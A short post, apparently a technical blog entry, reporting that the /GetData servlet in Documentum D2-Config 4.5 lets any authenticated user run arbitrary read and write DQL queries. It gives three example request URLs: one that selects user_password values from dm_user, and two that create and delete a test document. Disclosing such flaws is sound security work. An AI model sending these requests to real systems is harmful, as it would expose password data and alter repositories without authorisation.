D2-Config (at least in D2 4.5) has a servlet (/GetData) that is used internally to run DQLs. I though when I saw it that, in the same way the REST query service is limited to run read queries, this won’t let you run write queries (you know, due to the “Get” in the name). Well, I was wrong. Any authenticated user can run any kind of query (limited by user permissions, as this is not run as superuser) by using this servlet:

D2-Config/servlet/GetData?dql1=select user_password from (select * from dm_user)&interfaceId=<my session id>&computerName=<my computer id>

D2-Config/servlet/GetData?dql1=create dm_document object set object_name='d2test' link '/Temp'&interfaceId=<my session id>&computerName=<my computer id>

D2-Config/servlet/GetData?dql1=delete dm_document object where folder('/Temp') and object_name='d2test'&interfaceId=<my session id>&computerName=<my computer id>